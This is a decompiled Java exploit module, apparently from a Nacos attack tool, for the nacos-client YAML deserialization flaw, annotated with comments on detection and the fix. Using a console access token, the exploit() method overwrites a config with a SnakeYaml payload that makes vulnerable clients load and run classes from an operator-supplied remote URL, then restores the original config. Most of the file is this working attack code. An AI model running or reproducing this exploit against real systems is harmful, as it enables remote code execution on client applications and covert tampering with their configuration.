package com.alibaba.nacos.exploit;

import com.alibaba.nacos.entity.ExecutionResult;
import com.alibaba.nacos.entity.Vulnerability;
import com.alibaba.nacos.httpclient.MyHttpRequests;
import java.io.UnsupportedEncodingException;
import java.net.URLEncoder;
import java.nio.charset.StandardCharsets;
import java.util.HashMap;
import org.json.JSONObject;
import org.springframework.beans.factory.BeanFactory;

/* loaded from: input_file:com/alibaba/nacos/exploit/Alibaba_Nacos_Client_Yaml_Deserialization.class */
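/**
 * Decompiled exploit module for the nacos-client YAML deserialization issue described by
 * {@link #getInfo()}: a Nacos console access token is used to publish a YAML configuration that a
 * vulnerable nacos-client (below 1.4.2, per the module's own description) parses with an unsafe
 * SnakeYaml constructor.
 *
 * <p>Facts relevant to a defender that are visible in this class:
 * <ul>
 *   <li>Precondition: a valid {@code accessToken} for the Nacos config API
 *       ({@code /v1/cs/configs}). Nothing here works without console-level access, so protecting
 *       that API (authentication, no default credentials, network exposure) is the first control.</li>
 *   <li>Server-side footprint: the target config ({@code dataId}/{@code group}) is first read, then
 *       overwritten with {@code type=yaml} content, then re-published from the previously fetched
 *       copy. The transient change should therefore appear in the Nacos server's config publish
 *       history and request logs (the token travels as a query parameter on every request).</li>
 *   <li>Client-side footprint: the YAML payload makes an affected client load classes from the URL
 *       passed as the fourth argument, i.e. outbound traffic from a config client to an unexpected
 *       host.</li>
 *   <li>Fix (as stated in {@link #getInfo()}): upgrade nacos-client to 1.4.2 or later, which parses
 *       configuration with SnakeYaml's {@code SafeConstructor}.</li>
 * </ul>
 *
 * <p>This class is not thread-safe in any documented way; it keeps no state beyond a constant.
 */
public class Alibaba_Nacos_Client_Yaml_Deserialization implements Vulnerability {
    // Compile-time constant (final String with a literal initializer); javac inlines it, which is
    // why the decompiled code repeated the literal everywhere. Referenced by name below instead.
    final String VulName = "Nacos-client Yaml反序列化漏洞";

    /**
     * Returns the human-readable description of the vulnerability (name, description, affected
     * versions, fix, reference) in the tool's Chinese display format.
     *
     * @return the formatted description text
     */
    @Override // com.alibaba.nacos.entity.Vulnerability
    public String getInfo() {
        // The stray getClass() calls in the decompiled form had no observable effect and are dropped.
        return String.format("漏洞名称: %s\n\n漏洞描述: %s\n\n漏洞影响版本: %s\n\n漏洞修复方案: %s\n\n漏洞复现分析: %s\n\n", VulName, "在Nacos的渗透测试的过程中, 如果获取到了控制台的权限, 可以尝试去修改yaml配置去进行盲打客户端, 导致客户端的命令执行。该漏洞只影响单独使用 nacos-client SDK的用户, 原因在于spring cloud、springboot、dubbo等框架中并非使用的 AbstractConfigChangeListener监听配置, 所以该漏洞只影响了使用AbstractConfigChangeListener监听配置的客户端。", " Nacos-Client < 1.4.2", "升级Nacos-Clinent版本, 在1.4.2版本中已修复了该漏洞, 修复方法为使用SnakeYaml提供的SafeConstructor解析Yaml配置", "https://mp.weixin.qq.com/s/SfAFMiraMKafcISo5IDEAg");
    }

    /**
     * No passive check is implemented: the vulnerability lives in the client, not in the server
     * being addressed, so this always reports "not confirmed" and points the operator elsewhere.
     *
     * @param str target base URL (unused)
     * @return a negative result carrying the vulnerability name and an explanatory message
     * @throws Exception declared by the interface; never thrown here
     */
    @Override // com.alibaba.nacos.entity.Vulnerability
    public ExecutionResult check(String str) throws Exception {
        return new ExecutionResult(false, VulName, null, "请使用Yaml反序列化模块进行验证及其利用");
    }

    /**
     * Publishes the YAML payload to the given config, waits, then re-publishes the config's previous
     * content. Logic is kept exactly as decompiled; only comments and the generic map type were added.
     *
     * @param str    Nacos base URL; a trailing slash is stripped for the publish URL only
     * @param strArr positional arguments: {@code [0]} dataId, {@code [1]} group,
     *               {@code [2]} accessToken, {@code [3]} URL the victim client is made to load
     *               classes from. No arity check is performed, so fewer than four entries throws
     *               {@link ArrayIndexOutOfBoundsException}.
     * @return always a "positive" result telling the operator to check whether the listener host
     *         received a request — the HTTP outcome is not reflected in the result
     * @throws Exception only from the argument access above; request errors are caught below
     */
    @Override // com.alibaba.nacos.entity.Vulnerability
    public ExecutionResult exploit(String str, String... strArr) throws Exception {
        String str2 = strArr[2];
        // Publish endpoint with the token as a query parameter (visible in server access logs).
        String str3 = (str.endsWith("/") ? str.substring(0, str.length() - 1) : str) + ("/v1/cs/configs?accessToken=" + str2);
        String str4 = strArr[0];
        String str5 = strArr[1];
        HashMap<String, String> hashMap = new HashMap<>();
        hashMap.put("Content-Type", "application/x-www-form-urlencoded");
        hashMap.put("Accept", "application/json");
        MyHttpRequests myHttpRequests = new MyHttpRequests();
        String str6 = null;
        try {
            // Snapshot the current config (as a form body) so it can be restored afterwards.
            // Note: this GET uses the raw base URL, unlike str3 above.
            str6 = convertJsonToUrlParams(myHttpRequests.sendRequest(str + "/v1/cs/configs?show=all&dataId=" + str4 + "&group=" + str5 + "&accessToken=" + str2, "GET", null, hashMap, true).getResponseBody());
        } catch (UnsupportedEncodingException e) {
            // UTF-8 is always available, so this is effectively unreachable; kept as in the original.
            // Any other failure of the snapshot propagates out of exploit() via the throws clause.
            e.printStackTrace();
        }
        try {
            // 1) Overwrite the config with the YAML payload (stored server-side as type=yaml).
            myHttpRequests.sendRequest(str3, "POST", "dataId=" + str4 + "&group=" + str5 + "&content=" + URLEncoder.encode("!!javax.script.ScriptEngineManager [\n  !!java.net.URLClassLoader [[\n    !!java.net.URL [\"" + strArr[3] + "\"]\n  ]]\n]", "UTF-8") + "&appName=&desc=&type=yaml&id=&md5=&tenant=&createTime=&modifyTime=&createUser=&createIp=&use=&effect=&schema=&configTags=", hashMap, true);
            // 2) Give subscribed clients time to receive the change. An interrupt here lands in the
            //    catch below and is swallowed (the interrupt flag is not restored).
            Thread.sleep(3000L);
            // 3) Restore the snapshot (posted twice). If the snapshot was never built, str6 is null
            //    and the target config is left holding the payload — a persistent server-side change.
            myHttpRequests.sendRequest(str3, "POST", str6, hashMap, true);
            myHttpRequests.sendRequest(str3, "POST", str6, hashMap, true);
            return new ExecutionResult(true, VulName, "请检查服务端是否收到请求,若收到则存在漏洞", null);
        } catch (Exception e2) {
            // Same result on failure: the tool reports "check the listener" regardless of whether
            // the requests succeeded, and the exception is dropped. Left unchanged deliberately.
            return new ExecutionResult(true, VulName, "请检查服务端是否收到请求,若收到则存在漏洞", null);
        }
    }

    /**
     * Flattens a JSON object into an {@code application/x-www-form-urlencoded} body
     * ({@code k1=v1&k2=v2}); used to re-publish a config from the server's GET response.
     *
     * <p>Every value is rendered with {@code toString()}, so nested objects and arrays become their
     * JSON text. Key order is whatever {@code JSONObject.keySet()} yields. The decompiled form used
     * Spring's {@code BeanFactory.FACTORY_BEAN_PREFIX} (the string {@code "&"}) as the separator — a
     * constant-inlining artefact, replaced here by the literal so the helper no longer reads as if it
     * depended on Spring.
     *
     * @param str JSON object text; anything else makes {@code JSONObject} throw
     * @return the encoded form body, empty when the object has no keys
     * @throws UnsupportedEncodingException declared for {@link URLEncoder#encode(String, String)};
     *         not expected for UTF-8
     */
    private static String convertJsonToUrlParams(String str) throws UnsupportedEncodingException {
        JSONObject json = new JSONObject(str);
        StringBuilder body = new StringBuilder();
        for (String key : json.keySet()) {
            Object value = json.get(key);
            // NOTE(review): org.json's get() throws for a missing key and represents JSON null as
            // JSONObject.NULL, so this guard presumably never sees a Java null — verify against the
            // org.json version in use.
            if (value != null) {
                if (body.length() > 0) {
                    body.append("&");
                }
                body.append(URLEncoder.encode(key, StandardCharsets.UTF_8.name()));
                body.append("=");
                body.append(URLEncoder.encode(value.toString(), StandardCharsets.UTF_8.name()));
            }
        }
        return body.toString();
    }
}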
